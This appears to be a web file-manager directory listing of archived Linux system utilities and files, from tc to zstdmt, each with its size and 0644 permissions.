tc.tar File 616 KB 0644
tc.tar.gz File 263.82 KB 0644
telnet.tar File 109.5 KB 0644
telnet.tar.gz File 45.18 KB 0644
thin_ls.tar File 1.33 MB 0644
thin_ls.tar.gz File 510.81 KB 0644
thin_metadata_size.tar File 1.33 MB 0644
thin_metadata_size.tar.gz File 510.82 KB 0644
thin_rmap.tar File 1.33 MB 0644
thin_rmap.tar.gz File 510.81 KB 0644
thin_trim.tar File 1.33 MB 0644
thin_trim.tar.gz File 510.81 KB 0644
timedatectl.tar File 48 KB 0644
timedatectl.tar.gz File 15.88 KB 0644
timens_offsets.tar File 3 KB 0644
timens_offsets.tar.gz File 122 B 0644
timers.tar File 5 KB 0644
timers.tar.gz File 77 B 0644
timerslack_ns.tar File 4 KB 0644
timerslack_ns.tar.gz File 86 B 0644
timesync.tar File 1.5 KB 0644
timesync.tar.gz File 75 B 0644
tipc.tar File 92 KB 0644
tipc.tar.gz File 35.1 KB 0644
tkconch3.tar File 2.5 KB 0644
tkconch3.tar.gz File 556 B 0644
tload.tar File 20 KB 0644
tload.tar.gz File 5.09 KB 0644
tmpfiles.d.tar File 2 KB 0644
tmpfiles.d.tar.gz File 239 B 0644
tmpfiles.d.zip File 15.58 KB 0644
tmux.tar File 16 KB 0644
tmux.tar.gz File 6.08 KB 0644
tnftp.tar File 25 KB 0644
tnftp.tar.gz File 7.91 KB 0644
tr.tar File 48.5 KB 0644
tr.tar.gz File 18.09 KB 0644
trial3.tar File 2.5 KB 0644
trial3.tar.gz File 556 B 0644
troff.tar File 720.5 KB 0644
troff.tar.gz File 257.09 KB 0644
true.tar File 28 KB 0644
true.tar.gz File 9.52 KB 0644
truncate.tar File 36.5 KB 0644
truncate.tar.gz File 13.33 KB 0644
tsort.tar File 48.5 KB 0644
tsort.tar.gz File 17.71 KB 0644
tune2fs.tar File 104.5 KB 0644
tune2fs.tar.gz File 44.96 KB 0644
tzconfig.tar File 2 KB 0644
tzconfig.tar.gz File 180 B 0644
ubuntu-advantage.tar File 2 KB 0644
ubuntu-advantage.tar.gz File 142 B 0644
ubuntu-distro-info.tar File 24.5 KB 0644
ubuntu-distro-info.tar.gz File 8.03 KB 0644
ubuntu-drivers.tar File 20 KB 0644
ubuntu-drivers.tar.gz File 4.06 KB 0644
ucf.tar File 49.5 KB 0644
ucf.tar.gz File 10.9 KB 0644
ucf.zip File 30.67 KB 0644
udev.tar File 64.5 KB 0644
udev.tar.gz File 7.52 KB 0644
ufw.lock.lock.tar.gz File 75 B 0644
ufw.lock.tar File 1.5 KB 0644
ufw.tar File 6.5 KB 0644
ufw.tar.gz File 1.92 KB 0644
uid_map.tar File 5 KB 0644
uid_map.tar.gz File 108 B 0644
unicode_start.tar File 4.5 KB 0644
unicode_start.tar.gz File 1.43 KB 0644
unicode_stop.tar File 2.5 KB 0644
unicode_stop.tar.gz File 431 B 0644
unix_chkpwd.tar File 28 KB 0644
unix_chkpwd.tar.gz File 9.2 KB 0644
unix_update.tar File 32 KB 0644
unix_update.tar.gz File 11.88 KB 0644
unlink.tar File 32.5 KB 0644
unlink.tar.gz File 10.31 KB 0644
unxz.tar File 84.5 KB 0644
unxz.tar.gz File 33.92 KB 0644
update-ca-certificates.tar File 7 KB 0644
update-ca-certificates.tar.gz File 2.24 KB 0644
update-grub2.tar File 2 KB 0644
update-grub2.tar.gz File 152 B 0644
update-initramfs.tar File 8.5 KB 0644
update-initramfs.tar.gz File 2.3 KB 0644
update-java-alternatives.tar File 5 KB 0644
update-java-alternatives.tar.gz File 1.21 KB 0644
update-locale.tar File 4.5 KB 0644
update-locale.tar.gz File 1.38 KB 0644
update-passwd.tar File 36.5 KB 0644
update-passwd.tar.gz File 11.17 KB 0644
update-pciids.tar File 3.5 KB 0644
update-pciids.tar.gz File 847 B 0644
update-rc.d.d.tar.gz File 4.82 KB 0644
update-rc.d.tar File 18.5 KB 0644
upgrade-from-grub-legacy.tar File 3.5 KB 0644
upgrade-from-grub-legacy.tar.gz File 959 B 0644
uptime.tar File 16 KB 0644
uptime.tar.gz File 3.67 KB 0644
usbhid-dump.tar File 32 KB 0644
usbhid-dump.tar.gz File 9.29 KB 0644
useradd.tar File 129.5 KB 0644
useradd.tar.gz File 49.92 KB 0644
usermod.tar File 125 KB 0644
usermod.tar.gz File 49.68 KB 0644
users.tar File 37.5 KB 0644
users.tar.gz File 11.06 KB 0644
uuidd.tar File 32.5 KB 0644
uuidd.tar.gz File 9.76 KB 0644
v8-container.h.h.tar.gz File 1.97 KB 0644
v8-container.h.tar File 7.5 KB 0644
v8-source-location.h.h.tar.gz File 1011 B 0644
v8-source-location.h.tar File 4.5 KB 0644
v8-typed-array.h.h.tar.gz File 1.56 KB 0644
v8-typed-array.h.tar File 13 KB 0644
validlocale.tar File 3.5 KB 0644
validlocale.tar.gz File 950 B 0644
vcstime.tar File 16 KB 0644
vcstime.tar.gz File 2.29 KB 0644
vfio.tar File 1.5 KB 0644
vfio.tar.gz File 66 B 0644
vfio.zip File 142 B 0644
vgcfgbackup.tar File 2.89 MB 0644
vgcfgbackup.tar.gz File 932.16 KB 0644
vgcfgrestore.tar File 2.89 MB 0644
vgcfgrestore.tar.gz File 932.16 KB 0644
vgconvert.tar File 2.89 MB 0644
vgconvert.tar.gz File 932.16 KB 0644
vgcreate.tar File 2.89 MB 0644
vgcreate.tar.gz File 932.15 KB 0644
vgdisplay.tar File 2.89 MB 0644
vgdisplay.tar.gz File 932.16 KB 0644
vgexport.tar File 2.89 MB 0644
vgexport.tar.gz File 932.15 KB 0644
vgimportclone.tar File 2.89 MB 0644
vgimportclone.tar.gz File 932.16 KB 0644
vgmerge.tar File 2.89 MB 0644
vgmerge.tar.gz File 932.15 KB 0644
vgremove.tar File 2.89 MB 0644
vgremove.tar.gz File 932.15 KB 0644
vgrename.tar File 2.89 MB 0644
vgrename.tar.gz File 932.15 KB 0644
vgsplit.tar File 2.89 MB 0644
vgsplit.tar.gz File 932.15 KB 0644
viewres.tar File 33 KB 0644
viewres.tar.gz File 10.34 KB 0644
vim.basic.basic.tar.gz File 1.85 MB 0644
vim.basic.tar File 3.61 MB 0644
vimdiff.tar File 3.61 MB 0644
vimdiff.tar.gz File 1.85 MB 0644
vipw.tar File 58.5 KB 0644
vipw.tar.gz File 19.4 KB 0644
vmhgfs-fuse.tar File 48.5 KB 0644
vmhgfs-fuse.tar.gz File 20.11 KB 0644
vmware-checkvm.tar File 16 KB 0644
vmware-checkvm.tar.gz File 2.76 KB 0644
vmware-rpctool.tar File 20 KB 0644
vmware-rpctool.tar.gz File 6.88 KB 0644
wchan.tar File 6 KB 0644
wchan.tar.gz File 87 B 0644
wget.tar File 461 KB 0644
wget.tar.gz File 218.14 KB 0644
wgetrc.tar File 6.5 KB 0644
wgetrc.tar.gz File 2.25 KB 0644
whatis.tar File 49 KB 0644
whatis.tar.gz File 17.01 KB 0644
whiptail.tar File 32 KB 0644
whiptail.tar.gz File 11.12 KB 0644
wipefs.tar File 40 KB 0644
wipefs.tar.gz File 12.6 KB 0644
write.tar File 24 KB 0644
write.tar.gz File 6.44 KB 0644
x86_64-linux-gnu-ld.tar File 1.66 MB 0644
x86_64-linux-gnu-ld.tar.gz File 264.18 KB 0644
x86_64-linux-gnu-nm.tar File 45.5 KB 0644
x86_64-linux-gnu-nm.tar.gz File 18.56 KB 0644
xargs.tar File 64 KB 0644
xargs.tar.gz File 26.82 KB 0644
xauth.tar File 56.5 KB 0644
xauth.tar.gz File 20.24 KB 0644
xdpyinfo.tar File 41 KB 0644
xdpyinfo.tar.gz File 13.55 KB 0644
xfs_admin.tar File 3 KB 0644
xfs_admin.tar.gz File 728 B 0644
xfs_db.tar File 654 KB 0644
xfs_db.tar.gz File 295.77 KB 0644
xfs_estimate.tar File 16 KB 0644
xfs_estimate.tar.gz File 4.2 KB 0644
xfs_freeze.tar File 2.5 KB 0644
xfs_freeze.tar.gz File 515 B 0644
xfs_fsr.tar File 44 KB 0644
xfs_fsr.tar.gz File 18.24 KB 0644
xfs_growfs.tar File 40 KB 0644
xfs_growfs.tar.gz File 14.46 KB 0644
xfs_info.tar File 3 KB 0644
xfs_info.tar.gz File 791 B 0644
xfs_io.tar File 201.5 KB 0644
xfs_io.tar.gz File 92.66 KB 0644
xfs_metadump.tar File 2.5 KB 0644
xfs_metadump.tar.gz File 499 B 0644
xfs_quota.tar File 92 KB 0644
xfs_quota.tar.gz File 37.75 KB 0644
xfs_repair.tar File 601 KB 0644
xfs_repair.tar.gz File 299.49 KB 0644
xfs_rtcp.tar File 20 KB 0644
xfs_rtcp.tar.gz File 4.87 KB 0644
xfs_scrub.tar File 108 KB 0644
xfs_scrub.tar.gz File 48.07 KB 0644
xkill.tar File 16 KB 0644
xkill.tar.gz File 5.01 KB 0644
xlsclients.tar File 20 KB 0644
xlsclients.tar.gz File 6.18 KB 0644
xtables-legacy-multi.tar File 98.5 KB 0644
xtables-legacy-multi.tar.gz File 36.25 KB 0644
xtables-monitor.tar File 221 KB 0644
xtables-monitor.tar.gz File 91.05 KB 0644
xvinfo.tar File 20 KB 0644
xvinfo.tar.gz File 5.33 KB 0644
xzcat.tar File 84.5 KB 0644
xzcat.tar.gz File 33.92 KB 0644
xzcmp.tar File 8.5 KB 0644
xzcmp.tar.gz File 2.67 KB 0644
xzegrep.tar File 7.5 KB 0644
xzegrep.tar.gz File 2.62 KB 0644
xzless.tar File 3.5 KB 0644
xzless.tar.gz File 1.11 KB 0644
xzmore.tar File 4 KB 0644
xzmore.tar.gz File 1.2 KB 0644
zabbix-agent-timeweb.tar File 2 KB 0644
zabbix-agent-timeweb.tar.gz File 98 B 0644
zdiff.tar File 7.5 KB 0644
zdiff.tar.gz File 1.96 KB 0644
zerofree.tar File 16 KB 0644
zerofree.tar.gz File 3.41 KB 0644
zipdetails.tar File 60.5 KB 0644
zipdetails.tar.gz File 15.28 KB 0644
zipinfo.tar File 172 KB 0644
zipinfo.tar.gz File 81.22 KB 0644
zoneinfo-icu.tar File 466 KB 0644
zoneinfo-icu.tar.gz File 177.45 KB 0644
zstd.tar File 856.5 KB 0644
zstd.tar.gz File 376.92 KB 0644
zstdcat.tar File 856.5 KB 0644
zstdcat.tar.gz File 376.92 KB 0644
zstdless.tar File 2 KB 0644
zstdless.tar.gz File 115 B 0644
zstdmt.tar File 856.5 KB 0644
zstdmt.tar.gz File 376.92 KB 0644